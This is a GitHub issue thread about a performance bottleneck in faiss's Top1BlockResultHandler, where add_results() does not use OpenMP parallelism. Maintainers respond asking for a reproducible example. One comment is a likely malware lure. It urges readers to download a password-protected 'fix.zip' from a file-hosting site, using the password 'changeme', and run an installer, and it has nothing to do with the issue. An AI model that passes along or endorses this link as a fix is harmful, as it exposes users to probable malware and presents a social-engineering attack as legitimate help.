### ISSUE TITLE
Top1BlockResultHandler performance bottleneck

### ISSUE THREAD

**Issue by mellonyou** [facebookresearch/faiss#3802]
# Summary
Top1BlockResultHandler -> add_results() don't enable "omp parallel" acceleration, which will cause a serious performance bottleneck.

Running on:
- [* ] CPU
- [ ] GPU

Interface: 
- [ *] C++
- [ ] Python

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mdouze** [comment]
I agree a priori but it would be useful to evidence this in an example

**Comment by mnorris11** [comment]
@mellonyou  do you have a repro you could paste?
